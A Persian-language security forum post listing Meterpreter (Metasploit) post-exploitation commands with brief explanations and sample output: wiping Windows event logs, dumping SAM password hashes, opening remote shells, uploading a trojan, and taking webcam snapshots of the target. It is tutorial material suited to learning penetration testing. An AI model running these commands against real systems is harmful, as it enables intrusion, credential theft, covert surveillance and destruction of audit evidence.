ts icon
سرور تیم اسپیک گاردایران

پست های پیشنهاد شده

                    images (2).png

همونطور که میدونید meterpreter یکی از payload های تعاملی و قدرتمند metasploit هستش که از اهمیت مخصوصی برخورداره

اینجا ما با تعدادی از دستورات پرکاربرد و عمومیش با یک توضیح مختصر اشنا میشیم و از خروجی دستورات به عنوان مثال اطلاعات کسب میکنیم :

 

HELP

این دستور همونطور که از اسمش مشخصه برای دیدن منوی help در meterpreter استفاده میشه :

meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    channel       Displays information about active channels
...snip...

 

BACKGROUND

این دستور برای ارجاع سیشن فعلی به بک گراند استفاده میشه ، و پس از اون دستورات در msf اجرا میشن

برای برگشتن به سیشن کافیه دوباره باهاش تعامل برقرار کنید :

meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

 

CAT

مثل بش شل لینوکس محتوای فایلی که به عنوان ارگمان بهش داده بشه رو نمایش میده :

meterpreter > cat
Usage: cat file

Example usage:
meterpreter > cat edit.txt
guardiran digital security team

 

CD and PWD

این دو دستور هم باز مثل بش شل برای تغیر مسیر و نمایش ادرس مسیر فعلی در فایل سیستم استفاده میشه :

meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >

 

CLEAREV

با استفاده از این دستور در ویندوز لاگ های امنیتی ، سیستمی و اپلیکیشن ها پاکسازی میشن :

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...

 

DOWNLOAD 

موقع استفاده از دستور دانلود باید نوع سیستم عامل تارگت در نظر گرفته بشه ، به خاطر تفاوت نوع ادرس های فایل سیستم هاشون :

meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini

 

EDIT

با این دستور میتونیم در هاست تارگت یه فایل برای نوشتن باز کنیم :

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
.
...snip...
.
100666/rw-rw-rw-  0       fil   2012-03-01 13:47:10 -0500  edit.txt

meterpreter > edit edit.txt

 

EXECUTE

با استفاده از این دستور میتونیم در هاست تارگت فایل و کامند اجرا کنیم :

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows [Version 5.1.2600]
(C) Copyright Microsoft Corp.

C:\WINDOWS\system32>

 

GETUID

با این دستور یوزری که در هاست تارگت شل رو اجرا میکنه نمایش داده میشه :

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 

HASHDUMP

با این دستور محتوای دیتابیس SAM رو میتونیم دامپ کنیم :

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::

 

IDLETIME

این دستور ثانیه هایی که یوزر ریموت روی هاست idle شده رو نمایش میده :

meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs

 

IPCONFIG

این دستور اینترفیس و ادرس های سخت افزاری و نرم افزاری ماشین هدف رو نمایش میده :

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0

 

LPWD and LCD

این دستورات جالب همون cd و pwd هستند با این تفاوت که لوکال اجرا میشن ، مثال زیرو ببینید :

meterpreter > lpwd
/root

meterpreter > lcd MSFU
meterpreter > lpwd
/root/MSFU

meterpreter > lcd /var/www
meterpreter > lpwd
/var/www

 

LS

مثل نمونه شل برای لیست کردن فهرست استفاده میشه :

meterpreter > ls

Listing: C:\Documents and Settings\victim
=========================================

Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2019  .
40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2019  ..
100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2019  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2019  Application Data
...snip...

 

PS

این دستور هم مثل نمونه بش شل برای لیست کردن پروسه ها کاربرد داره :

meterpreter > ps

Process list
============

    PID   Name                  Path
    ---   ----                  ----
    132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    288   snmp.exe              C:\WINDOWS\System32\snmp.exe
...snip...

 

SEARCH

همونطور که از اسمش مشخصه برای جستجو استفاده میشه ، مثال :

meterpreter > search -f autoexec.bat
Found 1 result...
    c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
    c:\\xampp\perl\bin\search.bat (57035 bytes)

 

SHELL

با استفاده از دستور شل ، یک شل استاندارد از ماشین تارگت دریافت میکنیم :

meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows [Version 5.1.2600]
(C) Copyright Microsoft Corp.

C:\WINDOWS\system32>

 

UPLOAD

موقع استفاده از این دستور هم مثل دستور دانلود باید نوع سیستم عامل تارگت برای جلوگیری از بروز خطا در نظر گرفته بشه ، با توجه به تفاوت ادرس های فایل سیستم هاشون :

meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe

 

WEBCAM_LIST

با استفاده از این دستور یه لیست از وبکم های متصل به تارگت دریافت میکنیم :

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)

 

WEBCAM_SNAP

در این دستور با انتخاب و مشخص کردن وبکمی که با دستور قبل شناسایی کردیم میتونیم با وبکم موردنظر عکس بندازیم ، که با اپشن h- میتونیم از مزایای مختلفش مطلع بشیم :

meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری